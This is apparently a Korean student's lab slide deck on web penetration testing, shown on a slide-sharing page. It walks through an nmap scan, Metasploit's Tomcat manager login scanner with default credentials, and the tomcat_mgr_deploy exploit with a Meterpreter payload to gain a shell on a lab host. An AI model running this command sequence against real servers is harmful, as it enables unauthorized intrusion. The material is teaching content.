모의해킹 따라하기 웹 해킹 1534023 김 지수 2017.04.07.

Slides:



Advertisements
Similar presentations
충북대 네트워크 보안 연구실 [ gmail.com ] 정보 보호 응용 11. 해킹기술 (3) 11. 해킹기술 (3) - hacking & security -
Advertisements

작성자조성웅 작성일자 기본환경 1. Java : Eclipse : Tomcat : 6.0 이상 4. DB : MySQL File System : DFS 6. Framework - Spring : JPA 및 CXF.
1 장 Unix/Linux 소개 1 Helpers. 1 장 내용 1. 왜 유닉스인가 ? 2. 유닉스 시스템 구조 3. 유닉스 역사 및 버전 4. 리눅스 설치 ( 별도 2 시간 실습 ) 5. 사용 환경 6. 사용자 계정 관리 Unix/Linux 2.
목 차 Ⅰ 제도 도입 배경 및 개요 내일채움공제 사업 안내 내일채움공제 연계 지원 사업 Ⅲ Ⅱ.
제 4 장 인터넷 창병모 네트워크 구성 2 LAN(Local Area Network) LAN  근거리 통신망으로 집, 사무실, 학교 등의 건물과 같이  가까운 지역을 한데 묶는 컴퓨터 네트워크 이더넷 (Ethernet)  제록스 PARC.
교육방법 및 교육공학 5조 체험학습 박혜미 김다능 홍유지.
프로필 □ 기본 인적 사항 □ 학력 사항 - 성명: 한두성 - 주소: - 메일: 핸드폰:
업무사례 중심의 개인정보보호법 이해 교육기관 기관별 정보보안 역할.
경상대학교 TOEIC 접수 매뉴얼 경상대학교 접수페이지 페이지 설명
리눅스와 보안 PLUS 오태호.
『1교1사 자매 결연』으로 기업사랑 학교사랑 운동 전개
10 터널링.
(사)대한한돈협회 지부통합관리시스템 지부사용자화면 매뉴얼
TCP/IP 네트워크 제 26 장 Telnet과 Rlogin 정보통신연구실.
1. 스푸핑 공격 - 스푸핑(Spoofing): ‘속이다’ 의 의미.
Windows VISTA 사용자용 우리대학 무선인터넷 접속방법     ①  ① 1
Kali Linux Kali Linux tool 사용법
2018-1학기 대전·충남권역 이러닝 학점교류 학사일정
AJAX 기본중의 기본 xmlhttprequest
제5기 (월) ~ 6. 24(금).
웹 해킹 기초와 실습.
240%~250% + 메리스가든 그릇set (5만↑ 건당)
4. 시스템 관리 기본 naldo.
메리츠화재 11월 시상안 ★ 인보험 시상 - 첫째장 □ 시상1. 기본 시상 (단독실비,재물 및 성공사업자종합보험 제외)
<LS그룹 연수원 교육 아르바이트 채용 공고>
컴퓨터 네트워크 실습.
뇌를 자극하는 Windows Server 장. 원격 접속 서버.
SQL*Plus - Oracle ISQL -
Unix(Linux) shell programming
연습 문제 풀이 E BF F8 85 A5 E5 9B 37 A5 E5 9B FF 버전 헤더길이 서비스유형 전체길이
Apache Hive 빅데이터 분산 컴퓨팅 박영택.
리눅스와 보안 PLUS 오태호.
Ch. 1 LINUX SYSTEM.
유닉스 이론과 실습 √ 원리를 알면 IT가 맛있다 컴퓨터정보계열 이광규.
작성자 : 씨네모 (정의장) 멜주소 : 연락처 :
Part 라우터 1. 라우터 장비의 이해 2. 라우터 네트워크 환경 설정 3. 라우팅 테이블 설정과 점검.
F5 삭제 및 신규 SSL_VPN 설치 메뉴얼 * 기존 SSL_VPN F5 삭제 ② ① * 신규 SSL_VPN 설치 ② ①
◎ 취약점 분석 대상 ◎ 취약점 분석 도구 ◎ IPCAM 의 주소 스캔
박 명 호 한남대학교 컴퓨터공학과 인공지능 실험실
컴퓨터 네트워크 실습.
리눅스 명령어 실습 임베디드 시스템 I.
Matasploit의 소개와 사용법
오늘의 관심주 오늘의 관심종목 외인/기관 순매수 특징주 코스피 상해종합 다우존스 S&P500 16/02/18(목) 외국인 기관
우리대학 무선인터넷 접속방법 Windows XP 사용자용 [ 연결방법 ] [ 사용자 인증 및 등록]  
제9장 네트워킹 숙명여대 창병모 2011 가을.
1. 컴퓨터 모양의 아이콘에 마우스를 이동하여 오른쪽 버튼 클릭.
VPN 이란? ( 가상 사설 망 ) 인터넷 망을 전용선처럼 사용할 수 있도록 특수
B2B 전자도서관 B2B 전자도서관 웹서비스 사용자 매뉴얼.
1) 인터넷주소(강남구보건소)로 접속해주세요.
Google Cloud Platform을 이용한 서버 인프라 구축
대학창의발명대회.
제8장 특허소송.
제8장 네트워킹 숙명여대 창병모
화재발생시 행동요령 1. 발화초기의 안전조치 2. 화재신고 3. 피난유도 및 대피요령
라즈베리파이 기초과정 (1차시) ㈜헬로앱스 강사: 김영준 목원대학교 겸임교수.
4장 서버 구축을 위해 알아야 할 핵심 개념과 명령어
유닉스 개요 및 기본 사용법 ㅎㅎ 유닉스 개요 유닉스 시스템 접속 방법과 명령 사용법.
Linux/UNIX System Programming
B2B 전자도서관 B2B 전자도서관 웹서비스 사용자 매뉴얼.
Internet 유선 랜카드 A 회사 네트워크 장비 (인터넷 공유 기능 활성화)
Linux/UNIX System Programming
FTZ 과제풀이 Level 11,12 HyunJae Lee
Linux/UNIX Programming
시스템 인터페이스 Lab#6 C 쉘 프로그래밍 실습.
개인정보 수집/이용 동의서 □ 개인정보의 수집/이용 목적 - 채용 및 채용관리, 지원자 평가, 지원자 사후관리
HTML5 웹 프로그래밍 입문 홈페이지 계정.
매물장 로그인 직원을 미리 생성하시면 직원 ID로 로그인 가능.
CCTV 설정법.
Linux/UNIX System Programming
Presentation transcript:

모의해킹 따라하기 웹 해킹 1534023 김 지수 2017.04.07

[ Putty ] ① Ifconfig =>현재 나의 IP확인 ② nmap –sSV 192.168.111.0/24

[ 192.168.111.202:8180 ] ③ firefox & : 브라우저 실행 192.168.111.202 => IP주소 입력 홈페이지 접속 확인

[ Terminal ] ④ msfconsole => 메타스플로잇 연결 msf > search tomcat => 연결 포트 확인

[ Terminal ] ⑤ msf > use (톰캣 연결 구문 복사) = use auxiliary/scanner/http/tomcat_mgr_login ⑥ set RHOSTS 192.168.111.202 => 나의 IP ⑥ set RPORT 8180 => 8180

[ Terminal ] ⑦ exploit => 계정과 패스워드 확인

[ 192.168.111.202:8180 ] ⑧ 다시 브라우저 재 접속 Tomcat Manager 앞에서 확인했던 아이디 패스워드 입력 (tomcat : tomcat)

[ Terminal ] ⑨ search tomcat exploit/multi/http/tomcat_mgr_deploy 구문 복사

[ Terminal ] ⑩ use (복사 구문 =) exploit/multi/http/tomcat_mgr_deploy ⑪ set PASSWORD tomcat => 패스워드를 tomcat으로 설정 ⑫ set USERNAME tomcat => username tomcat으로 설정 ⑬ set RHOST 192.168.111.202 => IP주소 재 설정 ⑭ set RPORT 8180 => 포트 번호 재 설정

[ Terminal ] ⑮ set payload java/meterpreter/bind_tcp ⑯ exploit

[ Terminal ] ⑰ shell ⑱ ls ⑲ exit

[ Terminal ] ⑰ shell ⑱ ls =>목록 확인 ⑲ exit

[ Terminal ] ⑳ meterpreter > sysinfo =>상대방의 정보를 획득 확인

감사합니다.